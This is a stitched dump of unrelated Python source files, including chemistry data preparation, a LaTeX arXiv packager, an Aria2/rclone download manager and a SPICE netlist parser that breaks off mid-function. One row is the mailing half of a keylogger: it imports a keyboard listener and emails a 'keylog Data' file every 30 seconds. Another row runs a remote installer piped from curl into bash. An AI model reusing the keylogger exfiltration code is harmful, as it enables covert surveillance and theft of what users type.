#print(ccsbase)
if not os.path.exists('./{}/ccsbase'.format(directory)):
    os.makedirs('./{}/ccsbase'.format(directory))
ccsbase.to_csv('./{}/ccsbase/dataccsbase.csv'.format(directory), index=False)

#---------------- All CCS ----------------
# AllCCS input: headerless CSV of (row number, SMILES).
number = np.arange(df3.shape[0])
data_allccs = np.column_stack((number, df3.SMILES))
allccs = pd.DataFrame(data=data_allccs)
#print(allccs)
if not os.path.exists('./{}/allccs'.format(directory)):
    os.makedirs('./{}/allccs'.format(directory))
allccs.to_csv('./{}/allccs/dataallccs.csv'.format(directory), index=False, header=None)

#---------------- Dark Chem ----------------
# DarkChem input: TSV with a single SMILES column.
data_darkchem = df3.SMILES
darkchem = pd.DataFrame(data=df3.SMILES)
# NOTE(review): the column is already named 'SMILES', so renaming 'SMI' is a
# no-op here -- confirm whether 'SMI' was intended as the source name.
darkchem = darkchem.rename(columns={'SMI': 'SMILES'})
#print(darkchem)
if not os.path.exists('./{}/darkchem'.format(directory)):
    os.makedirs('./{}/darkchem'.format(directory))
darkchem.to_csv('./{}/darkchem/datadarkchem.tsv'.format(directory), sep='\t', index=False)

#---------------- Deep CCS ----------------
# DeepCCS input: every molecule repeated once per adduct type.
df4 = df3.loc[df3.index.repeat(4)]
#print(original_deepccs)
add = np.array(["M+H", "M+Na", "M-H", "M-2H"])
adducts = np.tile(add, len(df4) // 4)
df4['Adducts'] = adducts
#print(original_deepccs)
data_deepccs = np.column_stack((df4.SMILES, df4.Adducts))
column_values_deepccs = ['SMILES', 'Adducts']
deepccs = pd.DataFrame(data=data_deepccs,
                       columns=column_values_deepccs)
#print(deepccs)
if not os.path.exists('./{}/deepccs'.format(directory)):
    os.makedirs('./{}/deepccs'.format(directory))
deepccs.to_csv('./{}/deepccs/datadeepccs.csv'.format(directory), index=False)
|
995,016 | ccdd99a98e373f609d1ebc54fc2891ffe2dc3d61 | #파이r^2
# Read a radius from the user and report the circle's area (pi approximated
# as 3.14, as in the original).
radius = int(input("반지름을 입력해주세요: "))
PI = 3.14
area = PI * radius ** 2
print("원의 넓이는", area, "이다.")
995,017 | be0d9ea28d740d52a06ef7a0ec0bb5263643c75c | from pynput.keyboard import Listener
import logging, time
from shutil import copyfile
import os
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
# Credentials come from the environment so they are not hard-coded here;
# both are None if the variables are unset.
EMAIL_ADDRESS = os.environ.get("DEVMAIL_ADDRESS")
EMAIL_PASSWORD = os.environ.get("DEVMAIL_PASSWORD")
def send_mail():
    """E-mail the captured log file to the configured address.

    Uses the DEVMAIL_ADDRESS / DEVMAIL_PASSWORD environment variables and
    sends the file from the current user's Desktop as an attachment via
    Gmail's STARTTLS SMTP endpoint.
    """
    username = os.getlogin()
    subject = 'keylog Data'

    msg = MIMEMultipart()
    msg['From'] = EMAIL_ADDRESS
    msg['To'] = EMAIL_ADDRESS
    msg['Subject'] = subject

    body = 'Here, is the logging data that you kept on check!'
    msg.attach(MIMEText(body, 'plain'))

    filename = 'mylog.txt'
    # NOTE(review): the path component "(unknown)" looks like a placeholder for
    # the real log file name (presumably mylog.txt) -- confirm.
    # The context manager closes the handle even if attachment building fails
    # (the original opened the file and never closed it).
    with open(f"C:/Users/{username}/Desktop/(unknown)", 'rb') as attachment:
        part = MIMEBase('application', 'octet-stream')
        part.set_payload(attachment.read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition', 'attachment; filename= ' + filename)
    msg.attach(part)
    text = msg.as_string()

    # SMTP used as a context manager: the connection is quit/closed even when
    # login or sendmail raises (the original only called quit() on success).
    with smtplib.SMTP('smtp.gmail.com', 587) as server:
        server.ehlo()
        server.starttls()
        server.ehlo()
        server.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
        server.sendmail(EMAIL_ADDRESS, EMAIL_ADDRESS, text)
        print('Hey Email Has Been Sent')
# Main loop: ship the log every 30 seconds, forever.
while(True):
    time.sleep(30)
    send_mail()
|
995,018 | a483432731cfcc537d0b60f0552dd12a5ce7bad9 | #!/usr/bin/env python3
import pathlib
import re
import shutil
import sys
from textwrap import dedent
import ply.lex
def get_deps_file():
    """Return the path of latexmk's dependency file.

    NOTE(review): the latexmkrc scan below is unfinished -- the loop matches
    'deps_file' lines but does nothing with them (see the TODO), and the
    build directory is hard-coded instead.
    """
    # TODO recover actual builddir
    with open('./latexmkrc', 'r') as f:
        lines = f.readlines()
    for line in lines:
        if 'deps_file' in line:
            pass
    return pathlib.Path('.', 'build', 'deps')
def find_matching_deps(depsfile: pathlib.Path):
    """Parse latexmk's deps file and return the project-relative dependencies.

    Skips the two header lines, stops at the '#===End' sentinel, and ignores
    absolute paths (system files) as well as blank lines.  A single trailing
    line-continuation backslash is stripped from each entry.
    """
    deps = []
    # open deps file and find matches
    with depsfile.open('r') as f:
        # skip the two header lines latexmk writes before the dependency list
        for _ in range(2):
            f.readline()
        while True:
            raw = f.readline()
            if not raw:
                # EOF safety: the original looped forever if the sentinel was missing
                break
            line = raw.strip()
            if line.startswith('#===End'):
                break
            # The original indexed line[0] and crashed on blank lines.
            if not line or line.startswith('/'):
                continue
            deps.append(line[:-1] if line.endswith('\\') else line)
    return deps
def remove_trailing_backslash(s):
    """Return *s* with one trailing backslash removed, if present.

    Unlike the original `s[-1]` check, this is safe for the empty string
    (the original raised IndexError on '').
    """
    return s[:-1] if s.endswith('\\') else s
def strip_comments(source):
    """Strip comments from LaTeX source files.

    Adapted from:
    <https://tex.stackexchange.com/a/214637> by Adam Merberg

    Implemented as a small ply lexer.  NOTE: the one-line "docstring" of each
    nested t_* rule below IS the token's regular expression (ply reads
    __doc__), so those strings are functional and must not be edited.
    """
    tokens = (
        'PERCENT',
        'BEGINCOMMENT', 'ENDCOMMENT',
        'BACKSLASH',
        'CHAR',
        'BEGINVERBATIM', 'ENDVERBATIM',
        'BEGINLISTING', 'ENDLISTING',
        'NEWLINE',
        'ESCPCT',
    )
    # Exclusive lexer states: inside each, only that state's rules apply.
    states = (
        ('linecomment', 'exclusive'),
        ('commentenv', 'exclusive'),
        ('verbatim', 'exclusive'),
        ('listing', 'exclusive'),
    )

    # Deal with escaped backslashes, so we don't think they're escaping %.
    def t_BACKSLASH(t):
        r"\\\\"
        return t

    # One-line comments
    def t_PERCENT(t):
        r"\%"
        t.lexer.begin("linecomment")
        return None

    # Escaped percent signs
    def t_ESCPCT(t):
        r"\\\%"
        return t

    # Comment environment, as defined by verbatim package
    def t_BEGINCOMMENT(t):
        r"\\begin\s*{\s*comment\s*}"
        t.lexer.begin("commentenv")
        return None

    # Verbatim environment (different treatment of comments within)
    def t_BEGINVERBATIM(t):
        r"\\begin\s*{\s*verbatim\s*}"
        t.lexer.begin("verbatim")
        return t

    # Listings environment (different treatment of comments within)
    def t_BEGINLISTING(t):
        r"\\begin\s*{\s*lstlisting\s*}"
        t.lexer.begin("listing")
        return t

    # Any other character in initial state we leave alone
    def t_CHAR(t):
        r"."
        return t

    def t_NEWLINE(t):
        r"\n"
        return t

    # End comment environment
    def t_commentenv_ENDCOMMENT(t):
        r"\\end\s*{\s*comment\s*}"
        # Anything after \end{comment} on a line is ignored!
        t.lexer.begin('linecomment')
        return None

    # Ignore comments of comment environment
    def t_commentenv_CHAR(t):
        r"."
        return None

    def t_commentenv_NEWLINE(t):
        r"\n"
        return None

    # End of verbatim environment
    def t_verbatim_ENDVERBATIM(t):
        r"\\end\s*{\s*verbatim\s*}"
        t.lexer.begin('INITIAL')
        return t

    # End of listing environment
    def t_listing_ENDLISTING(t):
        r"\\end\s*{\s*lstlisting\s*}"
        t.lexer.begin('INITIAL')
        return t

    # Leave contents of verbatim/listing environment alone
    def t_verbatim_listing_CHAR(t):
        r"."
        return t

    def t_verbatim_listing_NEWLINE(t):
        r"\n"
        return t

    # End a % comment when we get to a new line
    def t_linecomment_ENDCOMMENT(t):
        r"\n"
        t.lexer.begin("INITIAL")
        # Newline at the end of a line comment is stripped.
        return None

    # Ignore anything after a % on a line
    def t_linecomment_CHAR(t):
        r"."
        return None

    # Print errors
    def t_ANY_error(t):
        print(t.value, file=sys.stderr)

    lexer = ply.lex.lex()
    lexer.input(source)
    # Rules that returned None dropped their text; everything else is
    # reassembled verbatim.
    return u"".join([tok.value for tok in lexer])
def main():
    """Collect the build's dependencies into ./arxiv, write a Makefile, and
    strip comments from every copied .tex file (arXiv publishes sources)."""
    # make arxiv dir
    arxivdir = pathlib.Path('.', 'arxiv')
    # open deps file and find matches
    depsfile = get_deps_file()
    deps = find_matching_deps(depsfile)
    assert deps
    # copy matches to new subdirectory
    for dep in deps:
        src = pathlib.Path(dep)
        dst = arxivdir.joinpath(dep)
        dst.parent.mkdir(parents=True, exist_ok=True)
        shutil.copyfile(src, dst)
    # create makefile (dedent strips the common code indent; recipe lines keep
    # their literal tab, which make requires)
    with arxivdir.joinpath('Makefile').open('w') as f:
        f.write(dedent('''\
        .PHONY: main
        main:
        \tlatexmk -shell-escape -bibtex -pdf main
        .PHONY: clean
        clean:
        \tlatexmk -C main
        '''))
    # remove comments from all files
    for dep in deps:
        p = arxivdir.joinpath(dep)
        if p.suffix != '.tex':
            print(f'Skipping {p}')
            continue
        print(f'Stripping comments from {p}...')
        with p.open('r') as f:
            content = f.read()
        content = strip_comments(content)
        with p.open('w') as f:
            f.write(content)


if __name__ == '__main__':
    main()
|
995,019 | 59ae063f57bb33470c1ab806bcb3cf67db295825 | # import sklearn
# import matplotlib.pyplot as plt
# import random
# import re
import pandas as pd
# Load the question dump produced by the previous pipeline step.
df = pd.read_excel("2result.xlsx")
def cut(content):
    """Coerce a cell value to text with embedded newlines removed."""
    return str(content).replace("\n", "")
# Normalise the question-stem column, report the table size, and persist it.
df['题干'] = df['题干'].apply(cut)
print(df.shape)
df.to_csv("清理后.csv")
995,020 | 0854d7de25afd80bc51ab5b41a3263a69087c372 | from config_voting_ILSVRC12 import *
import tensorflow as tf
from tensorflow.python.client import timeline
from datetime import datetime
from copy import *
from FeatureExtractor import FeatureExtractor
# Which subset of the image list to process (Dict, VC, featDim, offset,
# Astride, Apad, Arf, subset_lb etc. come from the star import of the config
# module -- their exact semantics are not visible here).
subset_idx = 7
img_per_subset = 200
check_num = 2000 # save how many images to one file
samp_size = 50 # number of features per image
scale_size = 224  # short-side target for resizing

# Specify the dataset
assert(os.path.isfile(Dict['file_list']))
with open(Dict['file_list'], 'r') as fh:
    image_path = [ff.strip() for ff in fh.readlines()]
img_num = len(image_path)
print('total images number : {0}'.format(img_num))

# Indices of the images belonging to the chosen subset.
subset_ls = np.concatenate([np.arange(nn*img_per_subset, (nn+1)*img_per_subset) for nn in np.where(subset_lb==subset_idx)[0]])
subset_ls = subset_ls.astype(int)
print('subset images number : {0}'.format(len(subset_ls)))

extractor = FeatureExtractor(cache_folder=model_cache_folder, which_net='vgg16', which_layer=VC['layer'], which_snapshot=0)

# Accumulators: features are (featDim, N); locations are (iid, y0, x0, y1, x1).
res = np.zeros((featDim, 0))
loc_set = np.zeros((5, 0))
# for ii,iid in enumerate(range(img_num)):
for ii, iid in enumerate(subset_ls):
    img = cv2.imread(os.path.join(Dict['file_dir'], image_path[iid]))
    # img = cv2.resize(img, (scale_size, scale_size))
    img = myresize(img, scale_size, 'short')
    tmp = extractor.extract_feature_image(img)[0]
    assert(tmp.shape[2]==featDim)
    height, width = tmp.shape[0:2]
    # Crop the border cells, then flatten the spatial grid to columns.
    tmp = tmp[offset:height - offset, offset:width - offset, :]
    ntmp = np.transpose(tmp, (2, 0, 1))
    gtmp = ntmp.reshape(ntmp.shape[0], -1)
    # Sample samp_size feature columns; if there are too few, take them all
    # and pad with extra random repeats.
    if gtmp.shape[1] >= samp_size:
        rand_idx = np.random.permutation(gtmp.shape[1])[:samp_size]
    else:
        rand_idx = np.random.permutation(gtmp.shape[1])[:samp_size-gtmp.shape[1]]
        rand_idx = np.append(range(gtmp.shape[1]), rand_idx)
    res = np.column_stack((res, deepcopy(gtmp[:, rand_idx])))
    # Map each sampled grid cell back to its receptive field in image pixels.
    for rr in rand_idx:
        ihi, iwi = np.unravel_index(rr, (height - 2 * offset, width - 2 * offset))
        hi = Astride * (ihi + offset) - Apad
        wi = Astride * (iwi + offset) - Apad
        assert (hi >= 0)
        assert (hi <= img.shape[0] - Arf)
        assert (wi >= 0)
        assert (wi <= img.shape[1] - Arf)
        loc_set = np.column_stack((loc_set, [iid, hi, wi, hi+Arf, wi+Arf]))
    # Checkpoint every check_num images (and at the end), then reset the buffers.
    if (ii + 1) % check_num == 0 or ii == len(subset_ls) - 1:
        # if (ii + 1) % check_num == 0 or ii == img_num - 1:
        # print('saving batch {0}/{1}'.format(ii//check_num+1, math.ceil(img_num/check_num)))
        print('saving batch {0}/{1}'.format(ii//check_num+1, math.ceil(len(subset_ls)/check_num)))
        fnm = Dict['cache_path_sub']+'{}_set{}.pickle'.format(ii//check_num, subset_idx)
        # fnm = Dict['cache_path']+'{}.pickle'.format(ii//check_num)
        with open(fnm, 'wb') as fh:
            pickle.dump([res, loc_set], fh)
        res = np.zeros((featDim, 0))
        loc_set = np.zeros((5, 0))
    # Lightweight progress indicator.
    if ii%50==0:
        print(ii, end=' ', flush=True)
|
995,021 | 2eecc9292383557f9f9c2dcaf4210d8052ceb723 | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
import json, requests, os,re,urllib
from requests import get
from time import sleep
from time import ctime
# --- Interactive configuration --------------------------------------------
# These module-level globals are read by every RPC helper below.
# NOTE: `global` at module scope is a no-op; kept for documentation value.
global token
global rpc
global proxies
# Proxy used for page scraping; empty strings mean "no proxy"
# (menu option 7 overwrites this dict).
proxies = {
    'http': '',
    'https': '',
}
rpc = input('输入Aria2 RPC,留空为本地Aria2:\n')
if rpc == '':
    print('使用本地http://127.0.0.1:6800/jsonrpc')
    rpc = 'http://127.0.0.1:6800/jsonrpc'
token = input('输入Aria2密码:\n')
# Aria2 expects the RPC secret in "token:<secret>" form.
token = 'token:' + token.strip()
global path
path = input('输入保存路径:\n')
if path != '':
    pass
else:
    print('未输入保存路径,将存于/tmp')
    path = '/tmp'
# Normalize to a leading-slash path.
if path[0] == '/':
    pass
else:
    path = '/' + path
# In[ ]:
def aria2_addUri(url, path, title):
    """Add a download task (URL or magnet link) to Aria2 via JSON-RPC.

    The task is saved under ``path/title``.  Uses the module-level
    ``token`` and ``rpc`` globals configured at startup.

    Returns the decoded JSON-RPC response dict.
    """
    # Bug fix: the original placed this docstring AFTER the first
    # statement, where it was a dead string expression, not documentation.
    Dir = path + "/" + title  # per-task download directory
    jsonreq = json.dumps({'jsonrpc': '2.0',
                          'id': 'addUri',
                          'method': 'aria2.addUri',
                          'params': [token, [url], {"dir": Dir}]})
    c = requests.post(rpc, data=jsonreq)
    result = c.json()
    return result
# In[ ]:
import os
# 下载部分,下载网页或者图片
def download(url, Type):
    """Fetch *url* (a page or an image) with up to 3 retries.

    Returns the ``requests`` response object on success.  After three
    consecutive failures the string ``'no picture'`` is returned (legacy
    sentinel kept for callers).  *Type* is a label printed on success;
    an empty string suppresses the message.
    """
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
                             'Chrome/51.0.2704.63 Safari/537.36'}
    content = ''
    t = 0
    while t < 3:
        try:
            content = get(url, headers=headers, timeout=20, proxies=proxies)
            if Type != '':
                print('获取', Type, '成功')
            # Bug fix: the original had an unreachable `t = 4` after this
            # return; the dead statement is removed.
            return content
        except Exception as e:
            t = t + 1
            print('错误,', e)
            content = 'no picture'
    return content
# In[3]:
# 获取图片md链接
def addReadme(gid):
    """Query Aria2 for the files of task *gid* and build a README snippet.

    NOTE(review): the returned markdown is currently just "\n" — the image
    link text appears to have been lost from this source; confirm the
    intended content before relying on the return value.
    """
    jsonreq = json.dumps({'jsonrpc': '2.0', 'id': 'qwer',
                          'method': 'aria2.getFiles',
                          'params': [token, gid]})
    c = requests.post(rpc, data=jsonreq)
    d = c.json()
    e = d['result']
    print(e)
    # Scrape the first .jpg path out of the repr of the result list.
    Dir = re.search(r"path\': \'/.*?\.jpg", str(e))
    #print('1',Dir)
    #print(Dir)
    newDir = ''
    try:
        Dir = Dir.group()
        Dir = (Dir).replace("path': '", '')
        # URL-encode the local path for use in a link.
        newDir = urllib.parse.quote(Dir)
    except:
        # NOTE(review): bare except silently swallows a failed match.
        print('eee')
    md = "\n"
    return md
# 获取分页数以及每个分页的链接,然后
def get_page_info():
    """Interactively collect page URLs, then scrape each page.

    For every URL entered (until 'exit'): extract the title, all image
    links and the magnet link from the HTML, download the images into
    ``path/title``, queue the magnet on Aria2 and write README/index files.
    Bug fix: ``log.close`` was missing its call parentheses, so the log
    file handles were never explicitly closed/flushed.
    """
    status = True
    urls = []
    log = open('/tmp/downloadlog', 'a')
    log.write('\n' + '\t' + str(ctime()) + '\n')
    log.close()
    while status:
        # Read the page URLs one per prompt.
        url = input('添加网址链接,exit终止输入:\n')
        if url == 'exit':
            status = 0
        else:
            urls.append(url)
            log = open('/tmp/downloadlog', 'a')
            log.write(url + '\n')
            log.close()
    # Scan each page for title / images / magnet link.
    for url in urls:
        pics = []
        mds = []
        magnet = ''
        try:
            for line in (download(url, '').content.decode('utf-8').splitlines()):
                # Page title from the keywords meta tag.
                if '<meta name="keywords" content=' in line:
                    l = line.find("content=") + 9
                    rest = line[l:]
                    r = rest.find('"')
                    title = rest[:r]
                    print("\n" + "#####" + title + "#####")
                # Collect every image URL (skipping immediate duplicates).
                elif "img id" in line:
                    p = [m.start() for m in re.finditer('http', line)]
                    for l in p:
                        rest = line[l:]
                        r = rest.find('"')
                        pic = rest[:r]
                        if pics != []:
                            if pic != pics[-1]:
                                pics.append(pic)
                        else:
                            pics.append(pic)
                # Magnet link.
                elif "magnet:?xt=" in line:
                    l = line.find('magnet:?')
                    rest = line[l:]
                    r = rest.find('''<''')
                    magnet = rest[:r]
                    print(magnet)
        except Exception as e:
            print('发生错误,请确认是否输入正确网页,刚刚记录的网址在/tmp/downloadlog可找到。或到GitHub提交以下错误:\n')
            print(e)
        # NOTE(review): if parsing failed above, `title` may be unbound here.
        i = 0
        print('共', len(pics), '图')
        for pic in pics:
            i = i + 1
            file_path = path + "/" + title + "/" + str(i) + '.jpg'
            ndir = urllib.parse.quote(file_path)
            md = "\n"
            mds.append(md)
            picture = download(pic, file_path)
            if not os.path.exists(str(path)):
                os.makedirs(str(path))
            # Create the per-title subfolder.
            if not os.path.exists((path) + "/" + title):
                os.makedirs((path) + "/" + title)
            with open(file_path, 'wb') as out_file:
                try:
                    out_file.write(picture.content)
                except:
                    print('pic error')
        print('adding file')
        try:
            aria2_addUri(magnet, path, title)
            creat_file(title, magnet, path, mds)
        except:
            pass
# In[ ]:
def creat_file(title, magnet, path, mds):
    """Write README.md (title + magnet + image links) and an index.php
    gallery page into ``path/title``, creating directories as needed."""
    if not os.path.exists(str(path)):
        os.makedirs(str(path))
    # Create the per-title subfolder.
    if not os.path.exists((path) + "/" + title):
        os.makedirs((path) + "/" + title)
    index = title + """\n bt: """
    index = index + magnet + '\n'
    for md in mds:
        index = index + md
    index_file = path + '/' + title + "/" + "README.md"
    with open(index_file, 'w', encoding='utf-8') as w_file:
        # NOTE(review): iterating a string writes it one character at a
        # time; a single w_file.write(index) would be equivalent.
        for each_line in index:
            w_file.write(each_line)
    # PHP gallery page listing every image in the folder.
    # NOTE(review): 'widht' typo in the generated HTML attribute — this is
    # runtime output, left untouched here; confirm before fixing.
    php_index = """ <?php
$folder = "./"; // 文件夹路径
$files = array();
$handle = opendir($folder); // 遍历文件夹
while(false!==($file=readdir($handle))){
if($file!='.' && $file!='..'){
$hz=strstr($file,".");
if($hz==".gif" or $hz==".jpg" or $hz==".JPG"or $hz==".JPEG"or
$hz==".PNG"or $hz==".png"or $hz==".GIF")
{$files[] = $file; }
}
}
if($files){
foreach($files as $k=>$v){
echo '<img widht=auto src="'.$v.'">'; // 循环显示
}
}
?>
"""
    php_index_file = path + '/' + title + "/" + "index.php"
    with open(php_index_file, 'w', encoding='utf-8') as w_file:
        w_file.write(php_index)
# In[ ]:
def aria2_remove(gid):
    """Ask Aria2 to remove the download identified by *gid* and print
    the raw RPC reply."""
    payload = {
        'jsonrpc': '2.0',
        'id': 'remove',
        'method': 'aria2.remove',
        'params': [token, gid],
    }
    response = requests.post(rpc, data=json.dumps(payload))
    print(response.content)
# In[115]:
def aria2_tellActive():
    """Poll Aria2 for active downloads and print their progress.

    Returns a dict mapping download directory -> gid for tasks whose
    completed length equals the total length AND exceeds 512 MiB
    (smaller finished tasks are ignored).
    """
    downloads = {}
    jsonreq = json.dumps({'jsonrpc': '2.0', 'id': 'qwer',
                          'method': 'aria2.tellActive',
                          'params': [token]})
    c = (requests.post(rpc, data=jsonreq)).content
    a = json.loads(c.decode('utf-8'))
    b = a['result']
    #print(c.content)
    for info in b:
        # Fields are scraped out of the repr() of each status dict with
        # regexes rather than plain key access.
        complet_lenth = re.search(r"completedLength\'\: \'[0-9]*", str(info))
        complet_lenth = complet_lenth.group()
        complet_lenth = complet_lenth.replace("completedLength': '", '')
        total_lenth = re.search(r"totalLength\'\: \'[0-9]*", str(info))
        total_lenth = total_lenth.group()
        total_lenth = total_lenth.replace("totalLength': '", '')
        directory = re.search(r"dir\'\: \'.*?,", str(info))
        directory = directory.group()
        directory = directory.replace("dir': '", "").replace("',", '')
        gid = re.search(r"gid\'\: \'[a-zA-Z0-9]*", str(info))
        gid = gid.group()
        gid = gid.replace("gid': '", "")
        #print(complet_lenth)
        #print(total_lenth)
        if total_lenth == complet_lenth:
            # 536870912 bytes == 512 MiB threshold for "worth uploading".
            if (int(complet_lenth) > 536870912):
                print('@', directory, 'download complet')
                downloads[directory] = gid
        else:
            percent = (int(complet_lenth) / int(total_lenth)) * 100
            print(int(percent), '%', directory)
    return downloads
# In[ ]:
def checke_aria_rclone():
    """Return a tab-separated status line for the aria2c and rclone
    installations (first line of each tool's version output, or a
    'not installed' marker when the command produces nothing)."""
    from os import popen
    aria_line = popen('aria2c -v').readline()
    if not aria_line:
        aria_line = '未安装Aria2'
    rclone_line = popen('rclone --version').readline()
    if not rclone_line:
        rclone_line = '未安装rclone'
    return '\t' + aria_line + '\t' + rclone_line
def menu(path):
    """Show the interactive main menu once and dispatch the chosen action.

    Returns 1 to keep the menu loop running, 0 to exit.
    Bug fixes: the rclone install command read 'apt instal' (typo) and
    the upload-log handle used ``log.close`` without the call parentheses.
    """
    dependens = checke_aria_rclone()
    print('''-----------自动下片机------------''')
    print('''- 1. 添加se网址链接''')
    print('''- 2. 检测状态''')
    print('''- 3. 使用rclone上传已完成的bt任务''')
    print('''- 4. 添加正常下载链接''')
    # Offer the installer only when a dependency is missing.
    if '未' in dependens:
        print('''- 5. 安装Aria2Dash与rclone''')
    print('''- 6. 卸载''')
    print("- 7. 设置网页解析代理")
    print('''- 0. 退出''')
    print('''--------------------------------''')
    print(checke_aria_rclone())
    print('''--------------------------------''')
    opt = str(input('输入选项:'))
    if opt == '1':
        get_page_info()
    elif opt == '2':
        try:
            aria2_tellActive()
        except Exception as e:
            print(e)
            print('无法连接Aria2服务,请确认已正确启动并填写rpc')
    elif opt == '3':
        # Continuous upload loop: move finished Aria2 tasks to the
        # chosen rclone remote, then remove them from Aria2.
        print(str(os.popen('rclone listremotes').read()).replace(':', ''))
        rclone = input('输入选择使用的rclone remote: ')
        count = 0
        while True:
            os.system('date')
            try:
                active = aria2_tellActive()
            except Exception as e:
                print(e)
                print('无法连接Aria2服务,请确认已正确启动并填写rpc')
                return 0
            try:
                for key in active.keys():
                    remote_dir = key.strip()
                    # Escape spaces for the shell command below.
                    if ' ' in remote_dir:
                        remote_dir = remote_dir.replace(' ', '''\ ''')
                    if remote_dir[0] != '/':
                        remote_dir = '/' + remote_dir
                    print('---------------------------------------------------')
                    print('Preparing to upload ', remote_dir)
                    print('uploading...')
                    cmd = 'rclone move ' + remote_dir + ' ' + rclone.strip() + ':' + remote_dir + ' -P'
                    sleep(30)
                    print(cmd)
                    os.system(cmd)
                    log = open('/tmp/uploadlog', 'a')
                    log.write(str(ctime()) + remote_dir + '\n')
                    log.close()
                    aria2_remove(active[key])
                    sleep(10)
                    count = count + 1
                    if count == 10:
                        count = 0
                        print("sync between clouds")
            except Exception as e:
                print(e)
            print('---------------------------------------------------')
            sleep(30)
    elif opt == '4':
        path = input('input saving path:\n')
        folder = input('input saving folder:\n')
        url = input('input url/magnet:\n')
        aria2_addUri(url, path, folder)
    elif opt == '5':
        o = input('将运行快速部署Aria2的脚本。具有剩余容量显示监控及显示功能。本脚本会一同安装文件管理器,按y确认安装,n取消。详细内容看以下链接:\n https://github.com/Masterchiefm/Aria2Dash \n 输入选择:')
        if o == 'y':
            print('请稍等...')
            os.system('bash <(curl -s -L https://github.com/Masterchiefm/Aria2Dash/raw/master/Aria2Dash.sh)')
            # Bug fix: was 'apt instal rclone -y'.
            os.system('apt install rclone -y')
        else:
            print('已取消')
    elif opt == '6':
        os.system('sudo rm -rf /usr/bin/aria2py')
        os.system('sudo rm -rf /usr/bin/aria2_py.py')
        print('卸载完成,无残留')
    elif opt == '0':
        return 0
    elif opt == "7":
        # Configure the scraping proxy used by download().
        global proxies
        proxy = input("输入http proxy地址,如输入 127.0.0.1:10809")
        proxy_url = "http://" + proxy.strip()
        proxy_url2 = "https://" + proxy.strip()
        proxies = {
            'http': proxy_url,
            'https': proxy_url2,
        }
    else:
        print('输入有误')
        return 1
    return 1
# In[ ]:
if __name__ == "__main__":
    # Keep re-displaying the menu until it returns a falsy value
    # (option 0 returns 0; everything else returns 1).
    while menu(path):
        pass
|
995,022 | 81d0817abf9b3e15db8e4ce70a31e1428d1e6997 |
# -*- coding: utf-8 -*-
class Solution(object): # binary manipulation trick
    def reverseBits(self, n):
        """Reverse the 32 bits of an unsigned integer (Python 2).

        Shift the accumulator left and append n's current lowest bit,
        32 times.
        """
        ans = 0
        for i in xrange(32):
            # `n & 1` picks off the lowest bit of n.
            ans = (ans << 1) + (n & 1)
            n >>= 1
        return ans
# Example: for n = 234 = 0b00000000000000000000000011101010, the loop reads
# the bits right to left. Treating "<<1" as "*2", each bit is multiplied by
# a power of two through the nested accumulation, e.g.
# ((((0*2)+1)*2+0)*2+1) = 5 is just 0*2^3 + 1*2^2 + 0*2^1 + 1*2^0 in disguise.
a = 43261596
Sol = Solution()
print Sol.reverseBits(a)
# Alternative (slower) solution kept for reference as an inert string:
'''
class Solution(object):
    def reverseBits(self, n):
        def find(num):
            i = 0
            while 2**i<=num:
                i += 1
            i -= 1
            return i
        lst = []
        while n > 0:
            j = find(n)
            lst.append(j)
            n -= 2**j
        bits = [0 for x in xrange(32)]
        for item in lst:
            bits[item] = 1
        res = 0
        length = len(bits)
        for y in xrange(32):
            if bits[length-1-y] == 1:
                res += 2**y
        return res
'''
|
995,023 | 1f39c69a6a2a33b5e22ff05c323c81a9e54b03a9 | from os import link
from django.contrib.auth import forms
from django.contrib.auth.models import User
from django.db import models
from programms.models import Programm
# Create your models here.
class Download(models.Model):
    """Record of a user downloading a programme, keeping the served link."""
    # SET_NULL preserves the download history even if the user or
    # programme row is deleted.
    user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
    prog = models.ForeignKey(Programm, on_delete=models.SET_NULL, null=True)
    link = models.CharField(max_length=500)

    def __str__(self):
        # Bug fix: the field is named ``prog`` — ``self.product`` raised
        # AttributeError whenever a Download was rendered.
        return self.prog.title
995,024 | 8d8dbb444f1e508741035dd3b53d0254ed373701 | import re
from Element import HSrc
import Circuit
import Element
def parse(filename):
    """Parse a SPICE netlist file into a Circuit plus a list of elements.

    Line 1 is the title.  '.'-directives configure the analyses
    (.op/.dc/.ac/.tran); every other card is dispatched to a parse_*
    helper by its leading letter.  Returns ``(mycircuit, elements)``
    where *elements* is a list of single-element lists.
    """
    mycircuit = Circuit.Circuit(title="", filename=filename)
    file = open(filename, "r")
    lines = []
    line_number = 0
    elements = []
    if file is not None:
        # Pass 1: read lines, merge '+' continuations, record directives.
        while True:
            line = file.readline()
            line_number = line_number + 1
            line = line.strip().lower()
            if line_number == 1:
                # First netlist line is the title.
                mycircuit.title = line
            elif len(line) == 0:
                # Empty line / EOF terminates reading.
                break
            # Merge SPICE '+' continuation lines into this one.
            line = plus_line(file, line)
            if line[0] == '.':
                line_elements = line.lower().split()
                if line_elements[0] == ".end":
                    print("End of the netlist file.")
                elif line_elements[0] == ".op":
                    mycircuit.op = True
                elif line_elements[0] == ".dc":
                    mycircuit.dc = True
                    mycircuit.dc_source = line_elements[1]
                    mycircuit.dc_start = unit_transform(line_elements[2])
                    mycircuit.dc_stop = unit_transform(line_elements[3])
                    # Number of sweep points = span / step.
                    mycircuit.dc_point_number = \
                        (mycircuit.dc_stop - mycircuit.dc_start) / unit_transform(line_elements[4])
                    # TODO:mycircuit.dc_type = line_elements[]
                elif line_elements[0] == ".ac":
                    pattern = re.match(r'.AC (.*) (.*) ([0-9.]*[FPNUMKGT]?)(Hz)? ([0-9.]*[FPNUMKGT]?)(Hz)?', line, re.I)
                    mycircuit.ac = True
                    mycircuit.ac_type = pattern.group(1)
                    mycircuit.ac_point_number = int(unit_transform(pattern.group(2)))
                    mycircuit.ac_start = unit_transform(pattern.group(3))
                    mycircuit.ac_stop = unit_transform(pattern.group(5))
                elif line_elements[0] == ".tran":
                    pattern = re.match(r'.tran ([0-9.]*[FPNUMKGT]?)(s)? ([0-9.]*[FPNUMKGT]?)(s)?', line, re.I)
                    mycircuit.tran = True
                    mycircuit.tran_start = 0
                    mycircuit.tran_step = unit_transform(pattern.group(1))
                    mycircuit.tran_stop = unit_transform(pattern.group(3))
                else:
                    pass
